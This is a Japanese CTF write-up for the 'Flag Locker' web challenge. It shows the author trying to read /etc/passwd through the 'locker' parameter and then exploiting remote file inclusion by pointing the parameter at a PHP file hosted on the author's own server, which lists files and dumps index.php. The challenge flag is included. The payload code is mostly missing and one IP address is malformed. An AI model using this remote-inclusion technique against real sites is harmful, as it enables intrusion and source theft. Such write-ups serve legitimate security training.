Tags: rfi web 

Rating:

# ▼▼▼Flag Locker(Web:200)▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

**【機能】**

下記の2つのリクエストで表示内容が変わる

`104.103.5.112.91:1234/?locker=why`

`103.5.112.91:1234/?locker=privacy`

---

**【脆弱性を探す】**

`http://103.5.112.91:1234/?locker=///etc/passwd`

応答が返ってこない。どうやら/etc/passwdが検知されている?

---

次は、URLを挿入してみる。

`http://103.5.112.91:1234/?locker=http://my_server/`

my_serverに、`http://my_server/_locker.php`と、後ろに`_locker.php`が付与されてアクセスが来ることが確認できた。

---

**【exploit】**

my_serverに`_locker.php`というファイル名で下記を置いておく。

```
');
?>
```

---

下記を送信する

`http://103.5.112.91:1234/?locker=http://my_server/`

```
index.php
indiaflag.gif
privacy_locker.php
why_locker.php
```

---

index.phpのソースコードを取得しに行く

```
');
?>
```

---

下記を送信する

`http://103.5.112.91:1234/?locker=http://my_server/`

↓下記のように、index.phpの ソースコードが得られる。

```

```

`xiomara{s0metim3s_fl@g_c@n_b3_d3cl@red_@s_v@riable}`